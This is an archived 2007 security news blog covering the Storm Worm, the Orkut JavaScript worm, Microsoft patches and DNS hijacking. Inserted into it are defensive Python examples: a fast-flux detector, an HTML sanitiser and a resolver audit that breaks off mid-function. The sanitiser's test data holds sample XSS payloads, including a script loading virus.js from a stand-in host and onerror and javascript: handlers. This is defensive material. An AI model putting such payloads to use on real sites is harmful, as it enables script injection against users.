Security Protection - Harry Waldron (CS)

Security Best Practices, Breaking News, & Updates

December 2007 - Posts

Windows Server 2008 - Configuring Network Access Protection

Tech Republic recently shared this article on how to configure the NAP environment for the upcoming Windows Server 2008 operating system.  The examples are taken from the Beta 3 build, but they reflect what will most likely be included in the final version of NAP.  This is a major new security configuration toolkit that should help security and network administrators when Windows Server 2008 is released.

Windows Server 2008 - Configuring Network Access Protection 

QUOTE: Unlike other Microsoft solutions, the MS-NAP implementation does not resemble other products like Exchange, SQL, or IIS, but exists more as a collection of roles, policies, and services. MS-NAP generally requires at least two servers to fully implement all of the roles outlined by Microsoft. MS-NAP has a few basic elements that enable the implementation to succeed as designed.

Below are details of some of the best server practices to ensure a MS-NAP implementation can start off correctly:

  • Software and network policies: While not a technology matter, it's important to first identify the functionality desired by the MS-NAP implementation, and then apply the technology to define the service pack levels, anti-virus criteria, IPSec policies, and other factors to permit access to a specified network. And then to define what happens in a non-compliant state: remediation network, denied access, or other way of handling non-compliant systems.
  • Active Directory domain: This part of the back-end infrastructure should be very organized so that users accessing it have clear access to specified resources. Don't fall into the over-permissions trap simply to make things work. MS-NAP functions in a mash of roles depending on your configuration, but it's required that it be at functionality level Windows Server 2003 or higher.
  • VPN access: If the VPN enforcement method is used, the VPN solution is critically important for an MS-NAP implementation. These external (Internet) connections are for internal VPN connections to higher-level secure sites within your private network, if used.
  • Network equipment: Ensure that your equipment supports 802.1X authentication, especially if using wireless clients or the 802.1X EC.
  • DHCP networking: The DHCP network in regard to the MS-NAP implementation is important, as there are scope options that designate a class for remediation should a system not be compliant with the MS-NAP policy.
SecTor - Security Conference presentations available

Some excellent PowerPoint and other resources are still available from SecTor (the security conference held Nov 20-21 in Toronto).  In particular, I enjoyed Steve Riley's PPT presentation on Defending OSI Layer 8 (the human element):

Microsoft Office 2007 - Security Guide Available

Microsoft Office 2007 - Security Guide Available

QUOTE: The zip file includes the following elements:

* 2007 Microsoft Office Security Guide: This document describes the security features in the 2007 Office release and how they can help mitigate issues of confidentiality, integrity, and availability. The guide also contains prescriptive guidance for configuring your environment through Group Policy.
* 2007 Microsoft Office Threats and Countermeasures: This reference describes Group Policy settings that relate to security and privacy.

* Security Settings for 2007 Office Applications

* The following informational materials are also provided:

-- 2007 Microsoft Office Security Guide Data Sheet
-- 2007 Microsoft Office Security Guide FAQ
-- 2007 Microsoft Office Security Guide Executive Overview

New and Improved Storm Worm botnet coming in 2008

While Microsoft's MSRT has cleaned hundreds of thousands of copies found on client PCs, the Storm Worm botnet continues to launch new attacks (thankfully with fewer infected machines, given its diminished size).

Still, malware innovations continue for this highly advanced attack, which evades spam and AV detection controls.  The botnet is built to protect itself (e.g., fast-flux hosting and retaliatory DDoS against anyone probing it), which makes it difficult to locate the master servers and the malware authors themselves.   All new developments for the Storm Worm are important to follow during 2008.

New and Improved Storm Worm botnet coming in 2008

QUOTE: Obviously the Russian Business Network (RBN) is working overtime during the Christmas and New Year holiday, no doubt planning for many in the ISP security and anti-spam arena to be on skeleton staff.

The key objective for the Russian Business Network (RBN) is to rebuild the Storm Botnet, which is shown in various reports over the last few months to have shrunk from a few million enslaved PCs to more recently a few hundred thousand. One can only further guess as to what the RBN's main goal is in using a rebuilt Storm Botnet, e.g. the earlier DDoS (Denial of Service attack) on Estonia.

There are some interesting elements that make this new attack innovative:

-- Although much of what is detected is conventional spam, there is also a large amount of spam getting through many anti-spam defenses due to the use of "fake" BlogSpot (Blogger) links

-- Although most have identified it as the Zhelatin Storm email worm or a variant, it also appears as the more recent fake codec downloads, depending upon where the unfortunate user has come from. This now shows a "polymorphic" format, i.e. the virus or exploit has the ability to alter its signature in an attempt to combat anti-virus tools.

-- The fast-flux technique used to avoid detection in this case is actually "double-flux", characterized by multiple nodes within the network registering and de-registering their addresses. It is also safe to say this newer Storm network now also has improved defense mechanisms if examined too closely.

More information related to the most recent Christmas and New Year's e-card attacks can be found here:
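The double-flux behaviour described above can be recognised from a name's resolution history alone. The following is an added example, not code from the original post or the quoted article: it scores a series of constructed lookups (documentation address ranges, not real Storm hosts) on address count, network spread, TTL and answer churn, and separates single-flux (only the A records rotate) from double-flux (the name servers' addresses rotate too).

```python
"""Score a domain's DNS answer history for fast-flux behaviour.

Added example (not from the original post).  Each Observation is one lookup
of the suspect name: a_records are the IPv4 addresses returned for the name,
ns_addrs are the addresses the zone's NS names resolved to at that moment.
All histories below are constructed for the example.
"""
from dataclasses import dataclass
from ipaddress import ip_network


@dataclass(frozen=True)
class Observation:
    t: int            # seconds since the first lookup
    ttl: int          # TTL carried on the answer
    a_records: tuple  # IPv4 addresses returned for the name
    ns_addrs: tuple   # addresses the zone's NS names resolved to


@dataclass
class FluxReport:
    unique_ips: int
    unique_prefixes: int  # distinct /16 networks among the A records
    unique_ns: int
    min_ttl: int
    a_churn: float        # fraction of consecutive answers whose A set changed
    ns_churn: float       # same, for the NS addresses
    verdict: str          # "stable", "single-flux" or "double-flux"


def _prefix16(ip: str) -> str:
    return str(ip_network(f"{ip}/16", strict=False))


def _churn(seq):
    pairs = list(zip(seq, seq[1:]))
    if not pairs:
        return 0.0
    return sum(1 for a, b in pairs if set(a) != set(b)) / len(pairs)


def score(observations, max_ttl=300, min_ips=5, min_prefixes=3, min_churn=0.5):
    obs = sorted(observations, key=lambda o: o.t)
    ips = {ip for o in obs for ip in o.a_records}
    prefixes = {_prefix16(ip) for ip in ips}
    ns = {ip for o in obs for ip in o.ns_addrs}
    min_ttl = min(o.ttl for o in obs)
    a_churn = _churn([o.a_records for o in obs])
    ns_churn = _churn([o.ns_addrs for o in obs])
    # A short TTL alone is not flux: CDNs and load balancers also rotate
    # answers quickly, but within a few networks they control.  Flux shows
    # many addresses spread across unrelated networks (infected home PCs).
    fluxing = (min_ttl <= max_ttl and len(ips) >= min_ips
               and len(prefixes) >= min_prefixes and a_churn >= min_churn)
    if fluxing and ns_churn >= min_churn:
        verdict = "double-flux"
    elif fluxing:
        verdict = "single-flux"
    else:
        verdict = "stable"
    return FluxReport(len(ips), len(prefixes), len(ns), min_ttl,
                      a_churn, ns_churn, verdict)


# Constructed sample histories (documentation address ranges, not real hosts).
STABLE = [
    Observation(t, 3600, ("192.0.2.1",), ("192.0.2.53", "198.51.100.53"))
    for t in (0, 600, 1200)
]
CDN_LIKE = [  # fast rotation, but everything inside one /16
    Observation(0, 60, ("192.0.2.20", "192.0.2.21"), ("192.0.2.53",)),
    Observation(60, 60, ("192.0.2.22", "192.0.2.23"), ("192.0.2.53",)),
    Observation(120, 60, ("192.0.2.24", "192.0.2.25"), ("192.0.2.53",)),
]
DOUBLE_FLUX = [  # both the A answers and the NS addresses rotate every minute
    Observation(0, 30, ("192.0.2.10", "198.51.100.5"), ("203.0.113.9", "192.0.2.77")),
    Observation(60, 30, ("203.0.113.44", "192.0.2.77"), ("198.51.100.200", "203.0.113.9")),
    Observation(120, 30, ("198.51.100.200", "203.0.113.9"), ("192.0.2.10", "198.51.100.5")),
    Observation(180, 30, ("192.0.2.10", "203.0.113.44"), ("203.0.113.44", "192.0.2.77")),
    Observation(240, 30, ("198.51.100.5", "192.0.2.77"), ("198.51.100.200", "192.0.2.10")),
]

if __name__ == "__main__":
    for name, hist in (("stable", STABLE), ("cdn", CDN_LIKE), ("flux", DOUBLE_FLUX)):
        print(name, score(hist))
```

The thresholds are deliberately conservative: the CDN-like history rotates answers every minute yet stays "stable" because all addresses sit in one network, which is the distinction that keeps this kind of check from flagging every large web property.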

Perl 5.10.0 - First new release in Five Years

Perl is a robust programming language that was introduced in 1987. It has widespread usage in the open source environment, particularly for web and other processing scripts. While most Linux distributions automatically include Perl, a Windows version is also available for download. This is the first major version release in five years.

Perl 5.10.0 - First new release in Five Years

QUOTE:  Perl is a dynamic scripting language widely used in everything from Linux system utilities to Web servers to full-blown graphical enterprise applications. Just in time for Christmas, there's a new version of perl, the first in over five years. The first update since 2002 to the "practical extraction and report language," perl 5.10 adds both new language features and an improved perl interpreter, according to community site Perl Buzz.

Perl is a dynamic scripting language widely used in everything from Linux system utilities to Web servers to full-blown graphical enterprise applications. During its 20-year history, it gained massive popularity by assimilating the syntax from many predecessors, making it really easy to use for anyone already versed in sed, awk, grep, csh, C/C++, Lisp, and so on.

Change Log - What's new in Perl 5.10.0

More information related to Perl

Download Perl Distributions

Article: Defending Windows Vista

I thought both of these articles were on point and provide good feedback (esp. the 10 items listed in article #1).

Article #1 - What went wrong with Windows Vista

Article #2 - Defending Windows Vista

QUOTE: This is a post I never imagined writing. But with so many year-end reviewers panning Vista, somebody other than Microsoft must make the defense. Vista is so important an operating system that I'm writing not one, but two year-end reviews.

Vista hasn't done so well in other year-end reviews. Last week, my former JupiterResearch colleague Michael Gartenberg observed that "Vista's been really getting slapped around lately." Oh, is that an understatement.

As example, Gartenberg linked to a rather ridiculous CNET Crave ranking that put Vista on a list of "top ten terrible tech products." I referenced the same listing late last month. It's lame to put Vista on a list with stinkers like the late-1990s Apple puck mouse or Sinclair C5.

Vista isn't a bad operating system, it's just not remarkably better than Windows XP. Maybe if more bloggers and reviewers had kept those free laptops, they would now have enough experience using Vista to see its benefits.

CDTs Warning List of Deceptive Music Sites to Avoid

As I respect the intellectual property rights of artists and musicians, I've always been careful to avoid peer-to-peer (P2P) based sites offering "free music".  These P2P sites often carry malware, which is another danger to users beyond the potential copyright violations.

The sites identified below promote themselves as major subscription sites, where users pay a fee for the service. While these companies differ from the clearly illegal P2P based sites, subscribers could still experience some of the following issues:

-- A subscription fee must be paid (and refunds may be hard to obtain)

-- These sites are not licensed distributors for much of the mainstream catalog, as documented by the CDT

-- These sites may not have all the mainstream or popular artists

-- Adware, spyware, or other malware agents may even be present on a few of these sites

Sunbelt Blog - List of deceptive music sites

QUOTE: The CDT has published a list of deceptive music sites. As you know, there are people out there who actually believe that by signing up with these services, the music is somehow legit. Of course, these are basically pirate sites.

CDT - Music Download Warning List

QUOTE:  Thinking of signing up and paying money to a music download service that looks legitimate and perhaps even claims to be “legal?” Check our list first.

Unfortunately, some sites may be happy to take your money, and may leave you with the impression that they are legal sources of a full range of music – including the top performers and music labels – but they are not licensed distributors of at least a substantial quantity of mainstream music. In particular, the sites on our list promote themselves in ways that suggest their music catalog is relatively comprehensive, when in fact they appear to have done nothing to license or otherwise ensure the legality of any downloads from the major music labels.

In short, if you are an Internet user in the United States and you pay money to one of these services with the intention of being a lawful online music user, you may get less than you bargained for.

CDT - Music Download Web Sites to Avoid
Note - URLs have been altered to avoid accidentally navigating to these sites

allcoolmusic (dot) com
allmusicdownloads (dot) com
e-mp3now (dot) com
easymusicdownload (dot) com
ezmp3s (dot) com
free-music-downloads (dot) cc
freeaccessmp3 (dot) com
freemusicnow (dot) cc
howdoiwin (dot) com
imp3download (dot) com
imusicaccess (dot) com
imusicsearch (dot) com
klitetk (dot) com
mimusicamp3 (dot) com
mp3-all-free (dot) com
mp3-download-lyrics (dot) com
mp3-freebie (dot) com
mp3-freedom (dot) com
mp3downloadhq (dot) com
mp3downloadnet (dot) com
mp3downloadsnow (dot) com
mp3favorites (dot) com
mp3musichq (dot) com
mp3rocket (dot) com
musicjustfree (dot) com
my-free-songs (dot) com
my-music-now (dot) com
myipodaccess (dot) com
mymusicinc (dot) com
netmusicaccess (dot) com
netmusicsite (dot) com
realmusicnow (dot) com
unlimiteddownloadcenter (dot) com


I personally enjoy almost all types of music. A great legitimate resource was found last year, while searching for MP3s to assist our daughter on her high school project. While many mainstream and popular artists will not be found on this site, I've personally built an excellent library of MP3s during the past year.


CNET's site has about 75,000 songs on it. These are mostly from "starving artists" rather than the most popular ones. However, this is a safe, DRM-legal, and malware-free site. There's no need to register for anything, as you simply pick a musical category and start downloading. The overall concept is that these artists hope you'll find something in the samples you like, and maybe purchase some of their works.

Still, when it comes to some of my personal favorite categories (e.g., Celtic, Classic, Jazz, Gospel, Contemporary Instrumentals, etc.), the price is right -- if you have some time to download & review these. I've found some "gems" here that are great to load up in the MP3 player. These are all free; some are streaming-only links, which I skip, going for the MP3s (which are in good-quality 192 kbps format).

Steps for finding artists by category:

1. Select the type of music desired from the left menu pane (JAZZ in my example)

2. This takes you to the JAZZ main section (which you can drill down into sub-categories, or use the entire topical area)

3. Click on the ALL Artists tab

4. Then you can download available MP3s for individual artists as desired.  Sometimes only an on-line streaming link is offered rather than a sample MP3, and I skip these.

5. To build the MP3 library, I usually keep track of what has been downloaded in a text file over time.  I delete those items that I won't listen to again.  I usually create an overall folder for the music type (e.g., Classical, Jazz, Gospel, etc.) and then create sub-folders for each artist.

6. Finally, for good backup, I create CDs of the MP3 library or copy the folder to USB Flash drive so they can be loaded on my other PCs.


Storm Worm - Christmas and New Years e-card dangers

A new version of the Storm Worm is circulating, inviting recipients to visit websites that host malware which can infect their PC.  Always avoid suspicious and unexpected email, and please do not follow any of these links.  The Storm Worm is one of the most advanced malware attacks circulating and may be difficult to detect or clean from your system.

New Storm Worm - New Years Theme

QUOTE: This version is a New Years-themed e-card directing victims to a malicious website with malware behind it. The message comes in with a number of subjects and body-text. The one line message bodies are also being used as the subject lines.

Below are examples of email subject lines seen so far:

A fresh new year
As the new year...
As you embrace another new year
Blasting new year
Happy 2008!
Happy New Year!
It's the new Year
Joyous new year
New Hope and New Beginnings
New Year Ecard
New Year Postcard
Opportunities for the new year
Wishes for the new year
Happy New Year to You!
Happy New Year to <email address>
Lots of greetings on the new year
New Year wishes for You

There is also a Christmas e-card version that started circulating on Christmas Eve:

New Storm Worm - Christmas Theme

QUOTE: It turns out that the Storm gang was going to do a Christmas Malware run after all, they just decided to start it surprisingly late - on Christmas eve itself! This site contains a new version of the Storm Worm. The IP address of the site changes every second. Don't be naughty and go wandering to that domain. Please do not click on the "Download For Free Now" button as it will get you infected. Merry Christmas, y'all!

Google Toolbar - Custom Button Spoofing Vulnerability

A proof-of-concept has surfaced in which a crafted link to a custom button's underlying XML definition file lets an attacker disguise where the button's code is actually downloaded from. While Google's install dialog provides some additional safety checks, Google Toolbar users should avoid adding new custom buttons until this is fixed.

Google Toolbar - Custom Button Spoofing Vulnerability

QUOTE: The Google toolbar has found yet another use: as a possible malware vector. A researcher has released a proof-of-concept (PoC) code, which demonstrates how an attacker may install malicious software or conduct phishing attacks by prompting the user to install a new Google toolbar button.

Affected Google toolbar versions are as follows:

Google Toolbar 5 beta for Internet Explorer
Google Toolbar 4 for Internet Explorer
Google Toolbar 4 for Firefox (partially)

The code makes use of a specially crafted link that refers to the button’s XML file, which when clicked displays a dialog box summarizing the details of the button to be installed. This dialog box also displays a URL of where the button is to be downloaded. Through manipulation, however, a malicious author could make it appear that the said URL is non-malicious by adding special redirector strings. This further increases the user’s trust in the button to be installed. If the toolbar does get installed, the user must manually click on the button to execute it, which in turn may run an installation script (which a user must approve to install) or a fake log-in console (for phishing purposes).

However, Google classifies the PoC as non-critical, due to the multitude of steps involved before a user does get infected. Nevertheless, the search giant has confirmed that it is currently looking for a fix to remedy the bug.

Google actually encourages the creation of custom buttons for its toolbar, and outlines the ease of creating one in their Web site, complete with API documentation. This ease-of-creation feature, coupled with Google’s large fanbase, opens up plenty of possibilities for its users, malware authors included.  For the meantime, users of Google toolbar are advised to refrain from adding new buttons.

Google's Orkut Social Network - New worm infects 400,000 users

Thankfully, this new JavaScript-based worm was relatively harmless and did not compromise personal information.  It was most likely launched as a proof-of-concept test.   Google also quickly stopped the attack.

Folks should always be cautious in social network environments, as MySpace and similar sites have been constantly attacked. Avoid accepting anything suspicious even if it's from one of your friends, as they may be among the infected.  AV software should be kept up to date as many vendors now offer detection.

Google's Orkut Social Network - New worm infects 400,000 users

QUOTE: Google's Orkut social networking site appeared to have been hit by a relatively harmless worm, but one that demonstrated the continuing vulnerability of Web applications. Some Orkut users received an e-mail telling them they had been sent a new scrapbook entry -- a type of Orkut message -- on their profile from another Orkut user. The description of the group reveals that the worm was designed to show Orkut could be dangerous to users even if they do not click on malicious links, Hinckley wrote. The worm apparently did not try to steal any personal data.

At one time the infected group was adding new members at a rate of 100 per minute, and had reached a few hundred thousand members, according to various postings, but the problem appears now to be fixed, Hinckley wrote. Orkut's scrapbook feature allows people to post messages that contain HTML code, but it may lack a filter to strip out malicious JavaScript, Hinckley wrote.


McAfee: W32/KutWormor - Google Orkut Worm

QUOTE: The infected user will start to send scraps (messages on Orkut model) to his friends. The scrap will arrive by email to the friend with some Portuguese messages like: "2008 vem ai... que ele comece mto bem para vc", which means "2008 is arriving, I hope that it starts quite well for you", or "Boas Festas de final de Ano!", which means "Have a nice new years party!".

Once the user receives the email and checks the scrap, the message will contain a JavaScript, called virus.js, which will execute and start the scrap-sending process and add the infected user to the "Infectados pelo Virus Orkut" community. This is specially targeted at Brazilian users, the majority of the users of the Google social network, but other users may be affected by checking these scraps.

Method of Infection:
-- the user receives an email telling them that they got a new scrap...
-- the user checks Orkut's scrapbook...
-- by just checking the scrapbook they become infected, since the message has a link to a remote malicious .js file (virus.js)

Additional Links

Orkut Blog - More information may be posted later
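The quoted article says the scrapbook may lack a filter to strip malicious JavaScript. The following is an added example of such a filter, not Google's or McAfee's code: it keeps only a small allow list of tags and attributes, so script elements, event-handler attributes and javascript: links never reach the rendered page. The sample scraps are constructed for the example (virus.js is the file name from the article; example.invalid is a reserved, non-resolving domain).

```python
"""Allow-list sanitiser for user-supplied HTML such as a scrapbook message.

Added example, not code from Orkut or from the articles quoted above.
Tags and attributes not on the allow list are dropped, script/style bodies
are removed, event-handler attributes never pass, and href values must be
plain http(s) URLs.  The sample scraps at the bottom are constructed.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"b", "i", "u", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}        # no on*, style, src, ... anywhere
SAFE_SCHEMES = {"http", "https"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}


def _safe_href(value):
    if not value:
        return False
    # HTMLParser has already decoded entities, so "&#106;avascript:" arrives
    # here as "javascript:" and is rejected like any other non-http scheme.
    return urlsplit(value.strip()).scheme.lower() in SAFE_SCHEMES


class ScrapSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0        # >0 while inside an element whose body is dropped
        self.open_tags = []  # allowed tags currently open, for balanced output

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return            # <img onerror=...>, <object>, ... vanish here
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue      # drops onclick=, onmouseover=, style=, ...
            if name == "href" and not _safe_href(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag != "br":
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in self.open_tags:
            return
        while self.open_tags:            # close anything still open inside it
            inner = self.open_tags.pop()
            self.out.append(f"</{inner}>")
            if inner == tag:
                break

    def handle_data(self, data):
        if not self.skip:                # text is re-escaped, never passed raw
            self.out.append(html.escape(data, quote=False))

    def result(self):
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(fragment: str) -> str:
    parser = ScrapSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


# Constructed scraps: a loader in the style the article describes, and a benign one.
MALICIOUS_SCRAP = (
    '<p>2008 vem ai...</p>'
    '<script src="http://example.invalid/virus.js"></script>'
    '<a href="javascript:alert(1)" onclick="steal()">Boas Festas</a>'
    '<img src="x" onerror="alert(1)">'
)
BENIGN_SCRAP = '<b>Feliz 2008!</b> <a href="https://example.org/card">card</a>'

if __name__ == "__main__":
    print(sanitize(MALICIOUS_SCRAP))
    print(sanitize(BENIGN_SCRAP))
```

Note the allow-list approach: anything not explicitly permitted is dropped, so a tag or attribute that later turns out to be dangerous is already excluded. A deny list that only stripped `<script>` would have let the `onerror` handler and the javascript: link in the malicious scrap straight through.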

Mars - Closest encounter to earth until 2016 (not an email hoax this time)


Occasionally, I'll receive an email hoax as noted below.  However, this event is REAL, so please take time out and observe the brightest "star" in the skies:

POPULAR MARS Email Hoax - Planet Mars at closest distance to earth

I've been watching Mars for weeks and it's spectacular .. Please take a brief break if you have clear skies to observe this if possible. Even if you miss tonight, it'll still be close by all month.

Mars - Closest encounter to earth until 2016

VIEWING TIPS (at least for northern hemisphere)
- About 2 hours after sunset, look in eastern skies for a very bright "star" rising from horizon
- Mars will continue moving higher in skies overnight
- Eventually it will become the brightest "star" in skies
- For C2C fans, look for UFO opportunities tonight

QUOTE: CLOSE ENCOUNTER: Tonight, Dec. 18th, Mars makes its closest approach to Earth until the year 2016. At a distance of only 55 million miles, Mars outshines every star in the night sky (it is slightly brighter than Sirius) and draws attention to itself with its distinctive red color.

Spammed Trojan email - Avoid Happy New Year Exe attachment

'Tis the time of year to avoid all e-cards and attachments that appear to be seasonal in nature. Some of these attacks could require hours of repair work (if you're lucky enough to escape major losses of information). Even worse, some malware "phones home": when you later enter sensitive information such as credit card or bank account numbers, it is sent to the attacker and you can lose real money from those accounts.

Spammed Trojan email - Avoid Happy New Year Exe attachment

QUOTE: Some clown is spamming around an attachment called Happynewyear.exe ... When run, this malware drops a nice Christmas tree to your desktop and Systray. The malware itself (detected as Trojan-PSW:W32/Delf.BBE by our antivirus) steals passwords and other assorted information and sends them to a website.

IT Software Policies - Student Gets Detention for Using FireFox

Some folks have suggested this may be a hoax.  If the story is real, the student received only a minor two-hour detention rather than a major suspension for not following school policy. The student had been warned repeatedly to close the application, though the teacher may or may not have known that Firefox is simply another browser under which the student could complete the work.

The student may not have known how to save the work in progress, which was a compounding factor.  Still, this incident provides an interesting point regarding IT security and software policies: folks must abide by the policies, rules, and disciplinary warnings related to software use.

Personally, I like IE 7, Firefox, Opera, and Safari as browser tools.   The latest versions of each browser have good security and functionality.  Each of these tools has its advantages and disadvantages.  For example, as most exploits in the wild are written for IE, it might be beneficial for schools or libraries to have Firefox as a complementary browser to reduce leading-edge spyware or adware infections (albeit no browser is entirely immune or safe).  Still, if an organization does not want to support additional software, users should abide by the rules.

Student Gets Detention for Using FireFox

Below is a more pronounced example of the dangers associated with allowing folks at school or work to "do their own thing":

One example related to the dangers of allowing unrestricted software usage

QUOTE: Not browser related, but one of my friends booted one of the school computers from his USB which had Linux on it. It let him access all the files on the network of the system, so he could see the name and address of every pupil etc.. This is probably just the bad security at my school, but I can see why schools might take something like this seriously. It was funny though

Apple Safari for Windows XP and Vista - v3.0.4b Security Release

Apple began a beta program earlier this year to introduce Safari as a browser for the Windows environment.  From a functional standpoint, it has also been enhanced considerably, as noted in the change log below.

I recently upgraded to this latest version of Windows Safari for improved security. While IE 7 and Firefox 3.0b are used primarily, I've enjoyed testing this new browser, which also has good features.  Based on good reliability, performance, functions, and improved security, folks should upgrade to the latest version. 

Apple Safari for Windows XP and Vista - v3.0.4b release

Apple Safari for Windows XP and Vista - v3.0.4b download (15.6MB)



What's included?

New features

  • Allows windows to be resized from any side
  • Includes an additional font smoothing option ("standard")
  • Adds International text input methods
  • Adds advanced text options (contextual forms, international scripts)
  • Supports NTLM
  • Includes auto-detection of PAC files
  • Supports listing FTP directories
  • Links to proxy settings from Safari (Safari respects the proxy settings in the Windows Internet control panel)
  • Adds cookie management
  • Adds LiveConnect support
  • Includes tooltips
  • Adds spell checking and grammar checking
  • Allows printing of page numbers, titles, margins
  • Improves bookmark collection interface
  • Maintains original order of imported bookmarks
  • Adds an interface for editing AutoFill information
  • History searches now search the full text of visited websites
  • Adds a new preference to manually mark RSS articles as read
  • Includes support for tilt wheels

New keyboard shortcuts added

  • Alt-Enter in the Address field opens the same page in new background tab
  • Alt-Shift-Enter in the Address field opens the same page in new foreground tab
  • Ctrl-Enter in the Search field opens search results in new window
  • Alt-Enter in the Search field opens search results in new background tab
  • Alt-Shift-Enter in the Search field opens search results in new foreground tab
  • Ctrl-Enter for (www/com) completion in the URL bar
  • F6 to switch between the content area and URL bar
  • Ctrl-Tab and Ctrl-Shift-Tab to navigate between tabs
  • Backspace and Shift-Backspace to go back/forward between Web pages
  • Ctrl-F4 to close a tab
  • Ctrl-E to focus the search field
  • Windows-M to minimize
  • Ctrl-mouse wheel to zoom
  • Shift-mouse wheel to scroll horizontally


  • Improves application stability
  • Increases standards and site compatibility
  • Improves JavaScript performance
  • Improves application launch performance
  • For information about the security content of this update, visit this website
  • Allows you to click the lock icon to see detailed information about a site's certificate

Important: Safari Public Beta is preview software licensed for use on a trial basis for a limited time. Do not use Safari Public Beta in a commercial operating environment or with important data. You should back up all of your data before installing this software and regularly back up data while using the software. Your rights to use Safari Public Beta are subject to acceptance of the terms of the software license agreement that accompanies the software.

Symantec Blog - The 12 Days of Christmas Spam

While humourous, this reflects many of the emails we are bombarded with on a daily basis.

Microsoft Security Updates for December 2007 - PATCH NOW

On Patch Tuesday, Microsoft issued their latest security updates affecting Windows, IE, and Office as follows: 

Critical:
Microsoft Security Bulletin MS07-064
Vulnerabilities in DirectX Could Allow Remote Code Execution (941568)
Affects:  DirectX 7.0, 8.1, 9.0c and 10.0

Microsoft Security Bulletin MS07-068
Vulnerability in Windows Media File Format Could Allow Remote Code Execution (941569 and 944275)
Affects: Windows Media Format Runtime 7.1, 9, 9.5 and 11

Microsoft Security Bulletin MS07-069
Cumulative Security Update for Internet Explorer (942615)
Affects: Internet Explorer 5.01, 6.0 & 7

Important:
Microsoft Security Bulletin MS07-063
Vulnerability in SMBv2 Could Allow Remote Code Execution (942624)
Affects: Windows Vista

Microsoft Security Bulletin MS07-065
Vulnerability in Message Queuing Could Allow Remote Code Execution (937894)
Affects: Windows 2000 Pro and Server, Windows XP

Microsoft Security Bulletin MS07-066
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078)
Affects: Windows Vista

Microsoft Security Bulletin MS07-067
Vulnerability in Macrovision Driver Could Allow Local Elevation of Privilege (944653)
Affects: Windows XP and Windows 2003 Server

Bulletin Summary:

Based on the ISC analysis, the Internet Explorer updates have active exploits circulating and are rated as


So far, so good in my own experiences (about a 22MB download with reboot) for XP SP2, IE 7 and O/2003 ... One more resource is noted below

Malicious DNS servers could enhance Phishing attacks

DNS resolution translates the host name a user types into the numerical IP address that is actually used to reach the web site.  This potential attack is alarming, as vulnerable PCs could be hijacked to point to a malicious DNS server for all Internet access.

As the article explains, these DNS hijacking exploits could serve up the correct addresses most of the time and redirect users only occasionally. The alarming part is that users may believe they are completing a valid online transaction when they are in fact handing the attackers their bank account, credit card, or other identity details.

To reduce these risks, users should stay up-to-date on all security patches and AV protection. They should also be careful with email attachments and web links.

Article: DNS Attack Could Signal Phishing 2.0

QUOTE: Researchers at Google and the Georgia Institute of Technology are studying a virtually undetectable form of attack that quietly controls where victims go on the Internet. The study, set to be published in February, takes a close look at "open recursive" DNS servers, which are used to tell computers how to find each other on the Internet by translating domain names like into numerical Internet Protocol addresses. Criminals are using these servers in combination with new attack techniques to develop a new generation of phishing attacks.

The Georgia Tech and Google researchers estimate that as many as 0.4 percent, or 68,000, open-recursive DNS servers are behaving maliciously, returning false answers to DNS queries. They also estimate that another two percent of them provide questionable results. Collectively, these servers are beginning to form a "second secret authority" for DNS that is undermining the trustworthiness of the Internet, the researchers warned.

Here's how an attack would work. A victim would visit a Web site or open a malicious attachment that would exploit a bug in his computer's software. Attackers would then change just one file in the Windows registry settings, telling the PC to go to the criminal's server for all DNS information. If the initial exploit code was not stopped by antivirus software, the attack would give attackers virtually undetectable control over the computer.

Once they'd changed the Windows settings, the criminals could take victims to the correct Web sites most of the time, but then suddenly redirect them to phishing sites whenever they wanted -- during an online banking session, for example. Because the attack is happening at the DNS level, anti-phishing software would not flag the phoney sites.

"It's really the ultimate back door," said Chris Rouland, chief technology officer with IBM's Internet Security Systems division. "All the stuff we've deployed in the enterprise, it's not going to look for this."
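Two checks follow from the article, shown here as an added example (not code from the Georgia Tech/Google study or from the article): compare what several resolvers answer for a set of high-value names against the authoritative answers and flag any resolver that ever strays outside them, since a resolver that is right most of the time is exactly the behaviour described; and audit the per-interface resolver settings a Windows PC keeps in the registry, which is where the setting the quote calls a "file" actually lives. All addresses, resolver answers and registry values are constructed; the registry key layout is the standard Windows one.

```python
"""Checks against the DNS-hijack scenario described in the article.

Added example, not code from the researchers or the article.  All addresses,
resolver answers and registry values are constructed (documentation ranges).
"""
import re
from dataclasses import dataclass


@dataclass
class ResolverVerdict:
    resolver: str
    queried: int
    mismatched: list  # names for which an answer fell outside the authoritative set
    verdict: str      # "consistent" or "malicious"


def compare_resolvers(answers, authoritative):
    """answers: {resolver_ip: {name: set(ips)}}; authoritative: {name: set(ips)}.

    A resolver may legitimately return a subset of the authoritative addresses
    (round-robin, CDN), but one address outside the set is enough to flag it:
    the attack described above is correct most of the time on purpose.
    """
    verdicts = []
    for resolver, by_name in answers.items():
        bad = sorted(name for name, ips in by_name.items()
                     if name in authoritative and not ips <= authoritative[name])
        verdicts.append(ResolverVerdict(resolver, len(by_name), bad,
                                        "malicious" if bad else "consistent"))
    return verdicts


def parse_nameserver_value(value):
    """Windows stores these REG_SZ values as a comma- or space-separated list."""
    return [v for v in re.split(r"[,\s]+", value.strip()) if v]


# Models the values Windows keeps per adapter under
# HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}:
#   NameServer      = statically configured resolvers (what hijackers set)
#   DhcpNameServer  = resolvers handed out by DHCP
# A non-empty NameServer list overrides the DHCP-supplied one.
def audit_interfaces(interfaces, approved):
    """interfaces: {guid: {"NameServer": str, "DhcpNameServer": str}}.

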